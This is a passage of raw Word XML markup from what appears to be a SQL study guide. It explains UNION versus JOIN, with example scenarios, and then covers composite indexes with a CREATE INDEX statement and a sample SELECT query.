          <w:numId w:val="406"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>UNION</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> (by default): Removes duplicate rows from the combined result set.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A5C56C" w14:textId="77777777" w:rsidR="00D6081E" w:rsidRPr="00DA2F32" w:rsidRDefault="00D6081E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="406"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>UNION ALL</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Includes all rows from the result sets, including duplicates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C939BB8" w14:textId="77777777" w:rsidR="00D6081E" w:rsidRPr="00DA2F32" w:rsidRDefault="00D6081E" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Example Scenarios</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C9D9BA" w14:textId="77777777" w:rsidR="00D6081E" w:rsidRPr="00DA2F32" w:rsidRDefault="00D6081E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="407"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>UNION</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB2A663" w14:textId="77777777" w:rsidR="00D6081E" w:rsidRPr="00DA2F32" w:rsidRDefault="00D6081E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="407"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>You have a users table and a guests table, both with name and email columns, and you want a unified list of all people (both users and guests).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA5FA81" w14:textId="77777777" w:rsidR="00D6081E" w:rsidRPr="00DA2F32" w:rsidRDefault="00D6081E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="407"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>You need to compile data from two different reports that use the same schema but from different periods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D881F33" w14:textId="77777777" w:rsidR="00D6081E" w:rsidRPr="00DA2F32" w:rsidRDefault="00D6081E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="407"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>JOIN</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A21B693" w14:textId="77777777" w:rsidR="00D6081E" w:rsidRPr="00DA2F32" w:rsidRDefault="00D6081E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="407"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>You want to list orders and their corresponding customer information from two related tables (orders and customers).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A661771" w14:textId="77777777" w:rsidR="00D6081E" w:rsidRPr="00DA2F32" w:rsidRDefault="00D6081E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="407"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>You need to show a list of students and the courses they are enrolled in, linking data from students and courses tables based on enrollment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="399E3593" w14:textId="77777777" w:rsidR="00D6081E" w:rsidRPr="00DA2F32" w:rsidRDefault="00D6081E" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="057A150F" w14:textId="77777777" w:rsidR="00D6081E" w:rsidRPr="00DA2F32" w:rsidRDefault="00D6081E" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>UNION</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> when you need to stack or combine the results of multiple similar queries into one result set, especially when the data is not directly related by keys. Use a </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>JOIN</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> when you need to combine and relate data from multiple tables based on shared keys or relationships.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0018D137" w14:textId="77777777" w:rsidR="00135B2C" w:rsidRPr="00DA2F32" w:rsidRDefault="00135B2C" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79931518" w14:textId="531EEB45" w:rsidR="00D246F0" w:rsidRPr="00DA2F32" w:rsidRDefault="009A2163" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="128" w:name="_Toc178383311"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>What is a composite index</w:t>
      </w:r>
      <w:bookmarkEnd w:id="128"/>
    </w:p>
    <w:p w14:paraId="7C089B44" w14:textId="77777777" w:rsidR="00541E96" w:rsidRPr="00DA2F32" w:rsidRDefault="00541E96" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>composite index</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a type of database index that includes more than one column in a table. Composite indexes are used to optimize queries that filter or sort based on multiple columns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="713980F4" w14:textId="77777777" w:rsidR="00541E96" w:rsidRPr="00DA2F32" w:rsidRDefault="00541E96" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Key Concepts of Composite Index</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4614F738" w14:textId="77777777" w:rsidR="00541E96" w:rsidRPr="00DA2F32" w:rsidRDefault="00541E96" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="408"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Index Structure</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5CEC72" w14:textId="77777777" w:rsidR="00541E96" w:rsidRPr="00DA2F32" w:rsidRDefault="00541E96" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="408"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>A composite index is defined on two or more columns. For example, if you have a users table with columns first_name and last_name, you can create a composite index on both columns:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40BA8F0C" w14:textId="77777777" w:rsidR="00541E96" w:rsidRPr="00DA2F32" w:rsidRDefault="00541E96"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CREATE INDEX idx_name ON users (first_name, last_name);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="500EA257" w14:textId="77777777" w:rsidR="00541E96" w:rsidRPr="00DA2F32" w:rsidRDefault="00541E96" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="408"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>The order of the columns in the index is important because it determines how the database engine will use the index to optimize queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C76BB6C" w14:textId="77777777" w:rsidR="00541E96" w:rsidRPr="00DA2F32" w:rsidRDefault="00541E96" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="408"/>
        </w:num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5200F394" w14:textId="77777777" w:rsidR="00541E96" w:rsidRPr="00DA2F32" w:rsidRDefault="00541E96" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="408"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Composite indexes are particularly useful when you often query a table based on multiple columns. For example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C71FCE" w14:textId="77777777" w:rsidR="00541E96" w:rsidRPr="00DA2F32" w:rsidRDefault="00541E96"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SELECT * FROM users WHERE first_name = 'John' AND last_name = 'Doe';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D1C0112" w14:textId="77777777" w:rsidR="00541E96" w:rsidRPr="00DA2F32" w:rsidRDefault="00541E96" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="408"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>In this case, a composite index on (first_name, last_name) would significantly speed up the query.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7661E434" w14:textId="77777777" w:rsidR="00541E96" w:rsidRPr="00DA2F32" w:rsidRDefault="00541E96" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="408"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Index Prefix</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="247CA8D6" w14:textId="77777777" w:rsidR="00541E96" w:rsidRPr="00DA2F32" w:rsidRDefault="00541E96" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="408"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>The composite index can also be used for queries that filter based on the leading column(s) of the index. For example, if the index is created on (first_name, last_name), the index can be used for queries filtering on:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D65DCA7" w14:textId="77777777" w:rsidR="00541E96" w:rsidRPr="00DA2F32" w:rsidRDefault="00541E96" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="408"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>first_name alone.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27CED460" w14:textId="77777777" w:rsidR="00541E96" w:rsidRPr="00DA2F32" w:rsidRDefault="00541E96" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="408"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>first_name and last_name together.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B63B52" w14:textId="77777777" w:rsidR="00541E96" w:rsidRPr="00DA2F32" w:rsidRDefault="00541E96" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="408"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>However, the index cannot be used efficiently if the query only filters on last_name without also filtering on first_name.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E0E8777" w14:textId="77777777" w:rsidR="00541E96" w:rsidRPr="00DA2F32" w:rsidRDefault="00541E96" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Benefits of Composite Indexes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6FAF6E" w14:textId="77777777" w:rsidR="00541E96" w:rsidRPr="00DA2F32" w:rsidRDefault="00541E96" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="409"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Performance Optimization</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA9E894" w14:textId="77777777" w:rsidR="00541E96" w:rsidRPr="00DA2F32" w:rsidRDefault="00541E96" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="409"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Composite indexes can significantly speed up queries that filter or sort by multiple columns, reducing the need for full table scans.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A4C3288" w14:textId="77777777" w:rsidR="00541E96" w:rsidRPr="00DA2F32" w:rsidRDefault="00541E96" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="409"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
